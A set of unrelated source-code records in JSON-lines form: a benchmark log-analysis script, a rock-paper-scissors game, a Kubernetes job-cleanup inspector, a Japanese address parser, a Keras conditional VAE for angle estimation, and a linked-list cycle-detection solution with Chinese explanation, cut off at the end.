#click.echo(experiment)\n gmean = MEAN_MAX\n gstdev = MEAN_MAX\n min_error = MEAN_MAX\n found = False\n for (mean, stdev) in experiment:\n invalid_count = 0\n mmax = mean + tt * (stdev / math.sqrt(len(experiment)))\n mmin = mean - tt * (stdev / math.sqrt(len(experiment)))\n\n for (om, _) in experiment:\n if om < mmin or om > mmax:\n invalid_count += 1\n\n error = invalid_count / float(len(experiment))\n #click.echo('{:10.3f} {:10.3f} {:10.3f}'.format(mean, mmax, mmin, error))\n if error <= signi:\n #click.echo('found with error {} {}'.format(error, stdev))\n if not found:\n gmean = mean\n gstdev = stdev\n else:\n if gstdev > stdev:\n gmean = mean\n gstdev = stdev\n found = True\n else:\n if (not found) and error < min_error:\n gmean = mean\n gstdev = stdev\n min_error = min(min_error, error)\n\n click.echo('min error {}'.format(min_error))\n return gmean, gstdev, found\n\n\n\ndef analyze_mw_leaf(path, name):\n click.echo(\"Analyze mw logs: \"+path)\n\n fpath = os.path.join(DATA_PATH, name, os.path.basename(path))\n if not os.path.exists(fpath):\n os.makedirs(fpath)\n\n data = {}\n for _, _, files in os.walk(path):\n for fname in files:\n if fname.find('.txt') != -1:\n continue\n with open(os.path.join(path, fname)) as f:\n intervals = []\n current_interval = []\n for row in f.readlines():\n if row.find(\":\") == -1:\n # normalize to milliseconds\n if path.find('backendDuration') != -1 or path.find('totalDuration') != -1:\n current_interval.append(int(row.split('\\t')[-1])/1000.0)\n else:\n current_interval.append(int(row)/1000.0)\n else:\n intervals.append(current_interval)\n current_interval = []\n data[fname] = intervals\n\n (tp_mean, tp_stdev, rt_mean, rt_stdev, gi) = calculate_stats(data, fpath)\n click.echo('response-time mean: {:10.3f}\\t\\tstdev: {:10.3f}'.format(rt_mean, rt_stdev))\n\n with open(os.path.join(DATA_PATH, os.path.basename(path)+'-response-time-stats.txt'), 'a') as f:\n f.write(name.split('-')[-1]+\"\\t\")\n f.write('\\t'.join('{:10.3f}'.format(x) for x in [rt_mean, rt_stdev]))\n f.write('\\n')\n\n click.echo('throughput mean: {:10.3f}\\t\\tstdev: {:10.3f}'.format(tp_mean, tp_stdev))\n with open(os.path.join(DATA_PATH, os.path.basename(path)+'-throughput-stats.txt'), 'a') as f:\n f.write(name.split('-')[-1]+\"\\t\")\n f.write('\\t'.join('{:10.3f}'.format(x) for x in [tp_mean, tp_stdev]))\n f.write('\\n')\n\n\ndef get_name(path):\n for n in ['mpeek', 'msend', 'mpop', 'mquery', 'mecho', 'peek', 'send', 'pop', 'mload']:\n if path.find(n) != -1:\n return n\n\n\ndef analyze_db_leaf(path):\n click.echo(\"Analyze logs: \"+path)\n typ, num_threads = os.path.basename(path).split('-')[0], path.split('-')[-1]\n if get_name(path) == 'mload':\n fpath = os.path.join(DATA_PATH, get_name(path), typ+'-'+num_threads)\n if not os.path.exists(fpath):\n os.makedirs(fpath)\n else:\n fpath = os.path.join(DATA_PATH, get_name(path), num_threads)\n if not os.path.exists(fpath):\n os.makedirs(fpath)\n\n data = {}\n for _, _, files in os.walk(path):\n for fname in files:\n\n if fname.find('.txt') != -1:\n continue\n with open(os.path.join(path, fname)) as f:\n intervals = []\n current_interval = []\n for row in f.readlines():\n if row.find(\"B\") == -1 and row.find('b') == -1:\n # normalize to milliseconds\n parts = row.split('\\t')\n current_interval.append(int(parts[-1])/1000.0)\n else:\n intervals.append(current_interval)\n current_interval = []\n data[fname] = intervals\n\n (tp_mean, tp_stdev, rt_mean, rt_stdev, gi) = calculate_stats(data, fpath)\n\n\n click.echo('response-time mean: {:10.3f}\\t\\tstdev: {:10.3f}'.format(rt_mean, rt_stdev))\n\n with open(os.path.join(os.path.join(DATA_PATH, get_name(path)), typ+'-response-time-stats.txt'), 'a') as f:\n f.write(num_threads+'\\t')\n f.write('\\t'.join('{:10.3f}'.format(x) for x in [rt_mean, rt_stdev]))\n f.write('\\n')\n\n click.echo('throughput mean: {:10.3f}\\t\\tstdev: {:10.3f}'.format(tp_mean, tp_stdev))\n with open(os.path.join(os.path.join(DATA_PATH, get_name(path)), typ+'-throughput-stats.txt'), 'a') as f:\n f.write(num_threads+'\\t')\n f.write('\\t'.join('{:10.3f}'.format(x) for x in [tp_mean, tp_stdev]))\n f.write('\\n')\n\n return gi\n\n\nif __name__ == '__main__':\n cli()\n","sub_path":"scripts/plot/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":10984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"469162271","text":"import random\r\n\r\nresults = [(\"rock\", \"scissors\"), (\"scissors\", \"paper\"),(\"paper\", \"rock\"), (\"rock\", \"lizard\"), (\"lizard\",\"spock\"),\r\n (\"spock\", \"scissors\"), (\"scissors\", \"lizard\"), (\"lizard\", \"paper\"), (\"paper\", \"spock\"), (\"spock\", \"rock\")]\r\nmoves = [result[0] for result in results]\r\n\r\nplayer_score, computer_score =(0, 0)\r\nplayer = input(\"Enter rock / paper / scissors / lizard / spock / quit: \").lower()\r\nwhile player != \"quit\":\r\n computer = random.choice(moves)\r\n print(\"You Chose {}, I Chose {}\".format(player,computer))\r\n if player == computer:\r\n print(\"Its a Tie!\")\r\n elif(player, computer) in results:\r\n print(\"You Win\")\r\n player_score += 1\r\n elif(computer, player) in results:\r\n print(\"I Win!\")\r\n computer_score += 1\r\n else:\r\n print(\"Invalid Input\")\r\n player = input(\" Enter rock / paper / scissors / lizard / spock /quit: \").lower()\r\n\r\nprint(\"FINAL SCORE\")\r\nprint(\"You: {} Me: {}\".format(player_score, computer_score))","sub_path":"RockPaperScissorsLizaedSpock.py","file_name":"RockPaperScissorsLizaedSpock.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"225366994","text":"import os\nimport logging\nimport logging.config\nfrom pythonjsonlogger import jsonlogger\nfrom datetime import datetime;\nimport requests\nimport time\n\nfrom kubernetes import client, config, utils\nimport kubernetes.client\nfrom kubernetes.client.rest import ApiException\n\nclass ElkJsonFormatter(jsonlogger.JsonFormatter):\n def add_fields(self, log_record, record, message_dict):\n super(ElkJsonFormatter, self).add_fields(log_record, record, message_dict)\n log_record['@timestamp'] = datetime.now().isoformat()\n log_record['level'] = record.levelname\n log_record['logger'] = record.name\n\nlogging.config.fileConfig('logging.conf')\nlogger = logging.getLogger('inspector')\n\nLOG_LEVEL = os.getenv('LOG_LEVEL', 'INFO').upper()\nFILE_PROCESSOR = \"file-processor\"\n\n# Setup K8 configs\nconfig.load_kube_config()\nconfiguration = kubernetes.client.Configuration()\napi_instance = kubernetes.client.BatchV1Api(kubernetes.client.ApiClient(configuration))\n\ndef kube_delete_empty_pods(namespace='default', phase='Succeeded'):\n \"\"\"\n Pods are never empty, just completed the lifecycle.\n As such they can be deleted.\n Pods can be without any running container in 2 states:\n Succeeded and Failed. This call doesn't terminate Failed pods by default.\n \"\"\"\n # The always needed object\n #deleteoptions = client.V1DeleteOptions()\n # We need the api entry point for pods\n api_pods = client.CoreV1Api()\n # List the pods\n try:\n pods = api_pods.list_namespaced_pod(namespace)\n except ApiException as e:\n logging.error(\"Exception when calling CoreV1Api->list_namespaced_pod: %s\\n\" % e)\n return\n\n for pod in pods.items:\n logging.debug(pod)\n podname = pod.metadata.name\n if not podname.startswith(FILE_PROCESSOR):\n continue \n try:\n if pod.status.phase == phase:\n api_response = api_pods.delete_namespaced_pod(podname, namespace, body={})\n logging.info(\"Pod: {} deleted!\".format(podname))\n logging.debug(api_response)\n else:\n logging.info(\"Pod: {} still not done... Phase: {}\".format(podname, pod.status.phase))\n except ApiException as e:\n logging.error(\"Exception when calling CoreV1Api->delete_namespaced_pod: %s\\n\" % e)\n \n return\n\ndef kube_cleanup_finished_jobs(namespace='default', state='Finished'):\n \n \"\"\"\n Since the TTL flag (ttl_seconds_after_finished) is still in alpha (Kubernetes 1.12) jobs need to be cleanup manually\n As such this method checks for existing Finished Jobs and deletes them.\n By default it only cleans Finished jobs. Failed jobs require manual intervention or a second call to this function.\n Docs: https://kubernetes.io/docs/concepts/workloads/controllers/jobs-run-to-completion/#clean-up-finished-jobs-automatically\n For deletion you need a new object type! V1DeleteOptions! But you can have it empty!\n CAUTION: Pods are not deleted at the moment. They are set to not running, but will count for your autoscaling limit, so if\n pods are not deleted, the cluster can hit the autoscaling limit even with free, idling pods.\n To delete pods, at this moment the best choice is to use the kubectl tool\n ex: kubectl delete jobs/JOBNAME.\n But! If you already deleted the job via this API call, you now need to delete the Pod using Kubectl:\n ex: kubectl delete pods/PODNAME\n \"\"\"\n #deleteoptions = client.V1DeleteOptions()\n try: \n jobs = api_instance.list_namespaced_job(namespace)\n #print(jobs)\n except ApiException as e:\n print(\"Exception when calling BatchV1Api->list_namespaced_job: %s\\n\" % e)\n return\n \n # Now we have all the jobs, lets clean up\n # We are also logging the jobs we didn't clean up because they either failed or are still running\n for job in jobs.items:\n logging.debug(job)\n jobname = job.metadata.name\n jobstatus = job.status.conditions\n if not jobname.startswith(FILE_PROCESSOR):\n continue\n if job.status.succeeded == 1:\n # Clean up Job\n logging.info(\"Cleaning up Job: {}. Finished at: {}\".format(jobname, job.status.completion_time))\n try: \n # What is at work here. Setting Grace Period to 0 means delete ASAP. Otherwise it defaults to\n # some value I can't find anywhere. Propagation policy makes the Garbage cleaning Async\n api_response = api_instance.delete_namespaced_job(jobname,\n namespace)\n logging.debug(api_response)\n except ApiException as e:\n print(\"Exception when calling BatchV1Api->delete_namespaced_job: %s\\n\" % e)\n else:\n if jobstatus is None and job.status.active == 1:\n jobstatus = 'active'\n logging.info(\"Job: {} not cleaned up. Current status: {}\".format(jobname, jobstatus))\n \n # Now that we have the jobs cleaned, let's clean the pods\n kube_delete_empty_pods(namespace)\n # And we are done!\n return\n\ndef kube_processor_jobs_running(namespace='default', state='Finished'):\n \n try: \n jobs = api_instance.list_namespaced_job(namespace)\n #print(jobs)\n except ApiException as e:\n print(\"Exception when calling BatchV1Api->list_namespaced_job: %s\\n\" % e)\n return True\n \n # Now we have all the jobs, lets clean up\n # We are also logging the jobs we didn't clean up because they either failed or are still running\n for job in jobs.items:\n logging.debug(job)\n jobname = job.metadata.name\n jobstatus = job.status.conditions\n if jobname.startswith(FILE_PROCESSOR):\n return True\n \n return False\n\n\nclass Main():\n\n @staticmethod\n def log_level(level):\n logging.basicConfig(level=getattr(logging, level))\n\n @staticmethod\n def run_processor():\n\n while kube_processor_jobs_running():\n logger.debug(\"Previous job still running\")\n kube_cleanup_finished_jobs()\n time.sleep(1)\n\n job_name = FILE_PROCESSOR\n\n envs = [client.V1EnvVar(name=\"API_TOKEN\", value=os.getenv(\"API_TOKEN\"))]\n\n processor_container = client.V1Container(\n name=\"processor\",\n image=os.getenv(\"PROCESSOR_IMAGE\", \"ggrig/k8-traffic:re_processor\"),\n env=envs)\n\n pod_spec = client.V1PodSpec(\n restart_policy=\"Never\",\n containers=[processor_container])\n\n # Create and configure a spec section\n template = client.V1PodTemplateSpec(\n metadata=client.V1ObjectMeta(name=job_name, labels={\n \"app\": \"file-rebuild-processor\"}),\n spec=pod_spec)\n\n # Create the specification of the job\n spec = client.V1JobSpec(\n template=template,\n backoff_limit=0)\n\n # Instantiate the job object\n job = client.V1Job(\n api_version=\"batch/v1\",\n kind=\"Job\",\n metadata=client.V1ObjectMeta(name=job_name),\n spec=spec)\n\n logger.info(\"trying to create a job:\" + job_name)\n client.BatchV1Api().create_namespaced_job(\n body=job,\n namespace=\"default\")\n\n @staticmethod\n def application():\n\n # No Loop debug run\n #Main.run_processor()\n #return\n \n while True:\n try:\n Main.run_processor()\n except Exception as e:\n logger.error(e)\n\n @staticmethod\n def main():\n Main.log_level(LOG_LEVEL)\n Main.application()\n\nif __name__ == \"__main__\":\n Main.main()\n","sub_path":"upwork-devs/harut-gigoryan/rebuild-engine/inspector/inspector.py","file_name":"inspector.py","file_ext":"py","file_size_in_byte":7786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"83703462","text":"# -*- coding: utf-8 -*-\nimport logging\n\nfrom pkg_resources import resource_stream\n\nfrom parsel import Selector\n\n\n__version__ = '0.1.2'\n\n\nlogger = logging.getLogger(__name__)\n\n\nPREFECTURES_DATA = dict([l.decode('utf8').split() for l in resource_stream('japanese_address', 'data/prefs.dat')])\nJAPANESE_PREFECTURES = list(PREFECTURES_DATA.keys())\n\n\ndef load_wiki(datafile, endchar):\n sel = Selector(text=resource_stream('japanese_address', datafile).read().decode('utf8'))\n for trow in sel.xpath('//tr'):\n japtext = trow.xpath('.//*[@lang=\"ja\"]/text()').extract()\n if japtext and japtext[0].endswith(endchar):\n engtext = trow.xpath('.//*[@lang=\"ja\"]/ancestor::td/preceding-sibling::td//text()').extract()[-1]\n if engtext:\n yield japtext[0], engtext\n\n\nCITIES_DATA = dict(load_wiki('data/cities.html', \"市\"))\nWARDS_DATA = dict(load_wiki('data/wards.html', \"区\"))\nTOWNS_DATA = dict(load_wiki('data/towns.html', \"町\"))\n\n\ndef _parse_prefecture(txt):\n for pref in JAPANESE_PREFECTURES:\n start = txt.find(pref)\n if start >= 0:\n return txt[start:len(pref)].strip()\n\n\ndef _parse_divisor(txt, divisor, dlen):\n start = txt.find(divisor)\n if start >= 0:\n return txt[0:start+dlen].strip()\n\n\ndef _parse_level(div, kanji, parsed):\n dlen = len(kanji)\n if parsed.get('unparsed_right'):\n entity = _parse_divisor(parsed['unparsed_right'], kanji, dlen)\n if entity:\n parsed[div] = entity\n parsed['unparsed_right'] = parsed['unparsed_right'].split(entity, 1)[1].strip()\n elif parsed.get('unparsed_left'):\n entity = _parse_divisor(parsed['unparsed_left'], kanji, dlen)\n if entity:\n parsed[div] = entity\n parsed['unparsed_left'] = parsed['unparsed_left'].split(entity, 1)[1].strip()\n\n\ndef parse(txt):\n \"\"\"\n >>> parse('北海道 札幌市 中央区北5条西4-7')\n >>> parse('東京都江東区豊洲2丁目4-9')\n \"\"\"\n parsed = {}\n pref = _parse_prefecture(txt)\n if pref:\n parsed['prefecture'] = pref\n parsed['prefecture_eng'] = PREFECTURES_DATA[pref]\n reml, remr = txt.split(pref, 1)\n if reml:\n parsed['unparsed_left'] = reml.strip()\n if remr:\n parsed['unparsed_right'] = remr.strip()\n else:\n parsed['unparsed_right'] = txt\n\n _parse_level('city', \"市\", parsed)\n if 'city' in parsed:\n parsed['city_eng'] = CITIES_DATA[parsed['city']]\n _parse_level('ward', \"区\", parsed)\n if 'ward' in parsed:\n parsed['ward_eng'] = WARDS_DATA[parsed['ward']]\n _parse_level('district', \"郡\", parsed)\n _parse_level('town', \"町\", parsed)\n if 'town' in parsed:\n if parsed['town'] in TOWNS_DATA:\n parsed['town_eng'] = TOWNS_DATA[parsed['town']]\n else:\n logger.warning(f\"Town {parsed['town']} not in database\")\n _parse_level('city_district', \"丁目\", parsed)\n\n return parsed\n","sub_path":"japanese_address/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"385090740","text":"import numpy as np\n\nfrom keras.layers import Input, Dense, Lambda\nfrom keras.layers.merge import concatenate\nfrom keras.models import Model, Sequential\n\nimport keras.backend as K\n\nfrom models import vgg\n\nfrom utils.losses import gaussian_kl_divergence_tf, gaussian_kl_divergence_np\nfrom utils.losses import von_mises_log_likelihood_tf, von_mises_log_likelihood_np\nfrom utils.angles import deg2bit, bit2deg, bit2deg_multi\nfrom utils.losses import maad_from_deg, maximum_expected_utility, importance_loglikelihood\nfrom scipy.stats import sem\n\n\nclass CVAE:\n\n def __init__(self,\n image_height=50,\n image_width=50,\n n_channels=3,\n n_hidden_units=8,\n kl_weight=1.0):\n\n self.n_u = n_hidden_units\n self.image_height = image_height\n self.image_width = image_width\n self.n_channels = n_channels\n self.phi_shape = 2\n self.kl_weight = kl_weight\n\n self.x = Input(shape=[self.image_height, self.image_width, self.n_channels])\n\n self.phi = Input(shape=[self.phi_shape])\n\n self.u = Input(shape=[self.n_u])\n\n self.x_vgg = vgg.vgg_model(image_height=self.image_height,\n image_width=self.image_width)(self.x)\n\n self.x_vgg_shape = self.x_vgg.get_shape().as_list()[1]\n\n # self.x_vgg_prior = vgg.vgg_model(image_height=self.image_height,\n # image_width=self.image_width)(self.x)\n #\n # self.x_vgg_decoder = vgg.vgg_model(image_height=self.image_height,\n # image_width=self.image_width)(self.x)\n\n self.mu_encoder, self.log_var_encoder = self._encoder_mu_log_sigma()\n\n self.mu_prior, self.log_var_prior = self._prior_mu_log_sigma()\n\n self.u_prior = Lambda(self._sample_u)([self.mu_prior, self.log_var_prior])\n self.u_encoder = Lambda(self._sample_u)([self.mu_encoder, self.log_var_encoder])\n\n self.decoder_mu_seq, self.decoder_kappa_seq = self._decoder_net_seq()\n\n self.full_model = Model(inputs=[self.x, self.phi],\n outputs=concatenate([self.mu_prior,\n self.log_var_prior,\n self.mu_encoder,\n self.log_var_encoder,\n self.u_encoder,\n self.decoder_mu_seq(self.u_encoder),\n self.decoder_kappa_seq(self.u_encoder)]))\n\n self.full_model.compile(optimizer='adam', loss=self._cvae_elbo_loss_tf)\n\n self.decoder_model = Model(inputs=[self.x],\n outputs=concatenate([self.decoder_mu_seq(self.u_prior),\n self.decoder_kappa_seq(self.u_prior)]))\n\n def _encoder_mu_log_sigma(self):\n\n x_vgg_phi = concatenate([self.x_vgg, self.phi])\n\n hidden = Dense(512, activation='relu')(Dense(512, activation='relu')(x_vgg_phi))\n\n mu_encoder = Dense(self.n_u, activation='linear')(hidden)\n log_var_encoder = Dense(self.n_u, activation='linear')(hidden)\n\n return mu_encoder, log_var_encoder\n\n def _prior_mu_log_sigma(self):\n\n hidden = Dense(512, activation='relu')(self.x_vgg)\n\n mu_prior = Dense(self.n_u, activation='linear')(hidden)\n log_var_prior = Dense(self.n_u, activation='linear')(hidden)\n\n return mu_prior, log_var_prior\n\n def _sample_u(self, args):\n mu, log_var = args\n eps = K.random_normal(shape=K.shape(mu), mean=0., stddev=1.)\n return mu + K.exp(log_var / 2) * eps\n\n def _decoder_net_seq(self):\n decoder_mu = Sequential()\n decoder_mu.add(Dense(512, activation='relu',input_shape=[self.n_u]))\n # decoder_mu.add(Dense(512, activation='relu', input_shape=[self.n_u]))\n decoder_mu.add(Dense(512, activation='relu'))\n decoder_mu.add(Dense(2, activation='linear'))\n decoder_mu.add(Lambda(lambda x: K.l2_normalize(x, axis=1)))\n\n decoder_kappa = Sequential()\n decoder_kappa.add(Dense(512, activation='relu', input_shape=[self.n_u]))\n # decoder_kappa.add(Dense(512, activation='relu', input_shape=[self.n_u]))\n decoder_kappa.add(Dense(512, activation='relu'))\n decoder_kappa.add(Dense(1, activation='linear'))\n decoder_kappa.add(Lambda(lambda x: K.abs(x)))\n return decoder_mu, decoder_kappa\n\n def _cvae_elbo_loss_tf(self, y_true, model_output):\n mu_prior = model_output[:, 0:self.n_u]\n log_var_prior = model_output[:, self.n_u:self.n_u*2]\n mu_encoder = model_output[:, self.n_u*2:self.n_u*3]\n log_var_encoder = model_output[:, self.n_u*3:self.n_u*4]\n mu_pred = model_output[:, self.n_u*5:self.n_u*5+2]\n kappa_pred = model_output[:, self.n_u*5+2:]\n reconstruction_err = von_mises_log_likelihood_tf(y_true, mu_pred, kappa_pred)\n kl = gaussian_kl_divergence_tf(mu_encoder, log_var_encoder, mu_prior, log_var_prior)\n elbo = reconstruction_err - self.kl_weight*kl\n return K.mean(-elbo)\n\n def _cvae_elbo_loss_np(self, y_true, y_pred):\n mu_prior = y_pred[:, 0:self.n_u]\n log_var_prior = y_pred[:, self.n_u:self.n_u*2]\n mu_encoder = y_pred[:, self.n_u*2:self.n_u*3]\n log_var_encoder = y_pred[:, self.n_u*3:self.n_u*4]\n mu_pred = y_pred[:, self.n_u*5:self.n_u*5+2]\n kappa_pred = y_pred[:, self.n_u*5+2:]\n reconstruction_err = von_mises_log_likelihood_np(y_true, mu_pred, kappa_pred)\n kl = gaussian_kl_divergence_np(mu_encoder, log_var_encoder, mu_prior, log_var_prior)\n elbo = reconstruction_err - kl\n return elbo, reconstruction_err, kl\n\n def get_full_output(self, x, y):\n output = dict()\n y_pred = self.full_model.predict([x, y])\n output['mu_prior'] = y_pred[:, 0:self.n_u]\n output['log_sigma_prior'] = y_pred[:, self.n_u:self.n_u*2]\n output['mu_encoder'] = y_pred[:, self.n_u*2:self.n_u*3]\n output['log_sigma_encoder'] = y_pred[:, self.n_u*3:self.n_u*4]\n output['u_encoder_samples'] = y_pred[:, self.n_u*4:self.n_u*5]\n output['mu_pred'] = y_pred[:, self.n_u*5:self.n_u*5+2]\n output['kappa_pred'] = y_pred[:, self.n_u*5+2:]\n return output\n\n def generate_multiple_samples(self, x, n_samples=10):\n\n n_points = x.shape[0]\n cvae_kappa_preds = np.zeros([n_points, n_samples, 1])\n cvae_mu_preds = np.zeros([n_points, n_samples, 2])\n\n for i in range(0, n_samples):\n cvae_preds = self.decoder_model.predict(x)\n cvae_mu_preds[:, i, :] = cvae_preds[:, 0:2]\n cvae_kappa_preds[:, i, :] = cvae_preds[:, 2].reshape(-1, 1)\n\n return cvae_mu_preds, cvae_kappa_preds\n\n def get_multiple_predictions(self, x, y_bit, n_samples=5):\n\n n_points = x.shape[0]\n\n mu_bit_preds = np.zeros([n_points, n_samples, 2])\n kappa_preds = np.zeros([n_points, n_samples, 1])\n reconstruction_errs = np.zeros([n_points, n_samples, 1])\n kl_preds = np.zeros([n_points, n_samples, 1])\n elbo_preds = np.zeros([n_points, n_samples, 1])\n u_encoder = np.zeros([n_points, n_samples, self.n_u])\n\n mu_bit_preds_dec = np.zeros([n_points, n_samples, 2])\n kappa_preds_dec = np.zeros([n_points, n_samples, 1])\n\n for sid in range(0, n_samples):\n preds = self.full_model.predict([x, y_bit])\n mu_prior = preds[:, 0:self.n_u]\n log_sigma_prior = preds[:, self.n_u:self.n_u*2]\n mu_encoder = preds[:, self.n_u*2:self.n_u*3]\n log_sigma_encoder = preds[:, self.n_u*3:self.n_u*4]\n u_encoder[:, sid, :] = preds[:, self.n_u*4:self.n_u*5]\n mu_bit_preds[:, sid, :] = preds[:, self.n_u * 5:self.n_u * 5 + 2]\n kappa_preds[:, sid, :] = preds[:, self.n_u * 5 + 2:].reshape(-1, 1)\n elbo, reconstruction, kl = self._cvae_elbo_loss_np(y_bit, preds)\n reconstruction_errs[:, sid, :] = reconstruction\n kl_preds[:, sid, :] = kl\n elbo_preds[:, sid, :] = elbo\n preds_dec = self.decoder_model.predict(x, batch_size=100)\n mu_bit_preds_dec[:, sid, :] = preds_dec[:, 0:2]\n kappa_preds_dec[:, sid, :] = preds_dec[:, 2:].reshape(-1, 1)\n\n preds = dict()\n\n preds['mu_encoder'] = mu_encoder\n preds['log_sigma_encoder'] = log_sigma_encoder\n preds['mu_prior'] = mu_prior\n preds['log_sigma_prior'] = log_sigma_prior\n preds['u_encoder'] = u_encoder\n preds['mu_bit'] = mu_bit_preds\n preds['kappa'] = kappa_preds\n preds['reconstruction_err'] = reconstruction_errs\n preds['kl_div'] = kl_preds\n preds['elbo'] = elbo_preds\n preds['mu_bit_dec'] = mu_bit_preds_dec\n preds['kappa_dec'] = kappa_preds_dec\n preds['mu_rad_dec'] = np.deg2rad(bit2deg_multi(preds['mu_bit_dec']))\n preds['maxutil_deg_dec'] = maximum_expected_utility(np.rad2deg(preds['mu_rad_dec']))\n\n return preds\n\n def evaluate_multi(self, x, ytrue_deg, data_part, n_samples=50, verbose=1):\n\n ytrue_bit = deg2bit(ytrue_deg)\n\n results = dict()\n\n preds = self.get_multiple_predictions(x, ytrue_bit, n_samples=n_samples)\n\n results['elbo'] = np.mean(preds['elbo'])\n results['elbo_sem'] = sem(np.mean(preds['elbo'], axis=1))\n\n results['kl_div'] = np.mean(preds['kl_div'])\n results['kl_div_sem'] = sem(np.mean(preds['kl_div'], axis=1))\n\n ypreds = self.decoder_model.predict(x)\n ypreds_bit = ypreds[:, 0:2]\n kappa_preds = ypreds[:, 2:]\n\n ypreds_deg = bit2deg(ypreds_bit)\n\n loss = maad_from_deg(ytrue_deg, preds['maxutil_deg_dec'])\n results['maad_loss'] = np.mean(loss)\n results['maad_loss_sem'] = sem(loss, axis=None)\n\n importance_loglikelihoods = importance_loglikelihood(preds['mu_encoder'], preds['log_sigma_encoder'],\n preds['mu_prior'], preds['log_sigma_prior'],\n preds['u_encoder'],\n preds['mu_bit'], preds['kappa'],\n ytrue_bit)\n\n results['importance_log_likelihood'] = np.mean(importance_loglikelihoods)\n results['importance_log_likelihood_sem'] = sem(importance_loglikelihoods, axis=None)\n\n if verbose:\n\n print(\"MAAD error (%s) : %f ± %fSEM\" % (data_part, results['maad_loss'], results['maad_loss_sem']))\n\n print(\"ELBO (%s) : %f ± %fSEM\" % (data_part, results['elbo'], results['elbo_sem']))\n\n print(\"Approx Log-Likelihood, importance sampling (%s) : %f ± %fSEM\" %\n (data_part, results['importance_log_likelihood'], results['importance_log_likelihood_sem']))\n\n print(\"KL-div (%s) : %f ± %fSEM\" % (data_part, results['kl_div'], results['kl_div_sem']))\n\n return results\n","sub_path":"models/cvae_unconditioned_decoder.py","file_name":"cvae_unconditioned_decoder.py","file_ext":"py","file_size_in_byte":11355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"37751560","text":"\n'''\n面试题 02.08. 环路检测\n给定一个有环链表,实现一个算法返回环路的开头节点。\n有环链表的定义:在链表中某个节点的next元素指向在它前面出现过的节点,则表明该链表存在环路。\n\n\n示例 1:\n\n输入:head = [3,2,0,-4], pos = 1\n输出:tail connects to node index 1\n解释:链表中有一个环,其尾部连接到第二个节点。\n\n示例 2:\n\n输入:head = [1,2], pos = 0\n输出:tail connects to node index 0\n解释:链表中有一个环,其尾部连接到第一个节点。\n\n示例 3:\n\n输入:head = [1], pos = -1\n输出:no cycle\n解释:链表中没有环。\n\n进阶:\n你是否可以不用额外空间解决此题?\n\n面试题 02.08. Linked List Cycle LCCI\nGiven a circular linked list, implement an algorithm that returns the node at the beginning of the loop.\n\nCircular linked list: A (corrupt) linked list in which a node's next pointer points to an earlier node, so as to make a loop in the linked list.\n\nExample 1:\n\nInput: head = [3,2,0,-4], pos = 1\nOutput: tail connects to node index 1\nExample 2:\n\nInput: head = [1,2], pos = 0\nOutput: tail connects to node index 0\nExample 3:\n\nInput: head = [1], pos = -1\nOutput: no cycle\nFollow Up:\nCan you solve it without using additional space?\n'''\n\n\n\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def detectCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n slow = head\n fast = head\n\n while slow and fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n if slow == fast:\n break\n if not slow or not fast or not fast.next :\n return None\n slow = head\n while slow != fast:\n slow = slow.next\n fast = fast.next\n # print(fast)\n return slow\n\n# solutions\n\n'''\n方法 1:哈希表\n想法\n\n如果我们用一个 Set 保存已经访问过的节点,我们可以遍历整个列表并返回第一个出现重复的节点。\n\n算法\n\n首先,我们分配一个 Set 去保存所有的列表节点。我们逐一遍历列表,检查当前节点是否出现过,如果节点已经出现过,那么一定形成了环且它是环的入口。否则如果有其他点是环的入口,我们应该先访问到其他节点而不是这个节点。其他情况,没有成环则直接返回 null 。\n\n算法会在遍历有限个节点后终止,这是因为输入列表会被分成两类:成环的和不成环的。一个不成欢的列表在遍历完所有节点后会到达 null - 即链表的最后一个元素后停止。一个成环列表可以想象成是一个不成环列表将最后一个 null 元素换成环的入口。\n\n如果 while 循环终止,我们返回 null 因为我们已经将所有的节点遍历了一遍且没有遇到重复的节点,这种情况下,列表是不成环的。对于循环列表, while 循环永远不会停止,但在某个节点上, if 条件会被满足并导致函数的退出。\n\nJavaPython\n\npublic class Solution {\n public ListNode detectCycle(ListNode head) {\n Set visited = new HashSet();\n\n ListNode node = head;\n while (node != null) {\n if (visited.contains(node)) {\n return node;\n }\n visited.add(node);\n node = node.next;\n }\n\n return null;\n }\n}\n复杂度分析\n\n时间复杂度:O(n)O(n)\n\n不管是成环还是不成环的输入,算法肯定都只会访问每个节点一次。对于非成环列表这是显而易见的,因为第 nn 个节点指向 null ,这会让循环退出。对于循环列表, if 条件满足时会导致函数的退出,因为它指向了某个已经访问过的节点。两种情况下,访问的节点数最多都是 nn 个,所以运行时间跟节点数目成线性关系。\n\n空间复杂度:O(n)O(n)\n\n不管成环或者不成欢的输入,我们都需要将每个节点插入 Set 中一次。两者唯一的区别是最后访问的节点后是 null 还是一个已经访问过的节点。因此,由于 Set 包含 nn 个不同的节点,所需空间与节点数目也是线���关系的。\n\n\n\n方法 2:Floyd 算法\n想法\n\n当然一个跑得快的人和一个跑得慢的人在一个圆形的赛道上赛跑,会发生什么?在某一个时刻,跑得快的人一定会从后面赶上跑得慢的人。\n\n算法\n\nFloyd 的算法被划分成两个不同的 阶段 。在第一阶段,找出列表中是否有环,如果没有环,可以直接返回 null 并退出。否则,用 相遇节点 来找到环的入口。\n\n阶段 1\n\n这里我们初始化两个指针 - 快指针和慢指针。我们每次移动慢指针一步、快指针两步,直到快指针无法继续往前移动。如果在某次移动后,快慢指针指向了同一个节点,我们就返回它。否则,我们继续,直到 while 循环终止且没有返回任何节点,这种情况说明没有成环,我们返回 null 。\n\n下图说明了这个算法的工作方式:\n\n\n\n环中的节点从 0 到 C-1C−1 编号,其中 CC 是环的长度。非环节点从 -F−F 到 -1−1 编号,其中 FF 是环以外节点的数目。 FF 次迭代以后,慢指针指向了 0 且快指针指向某个节点 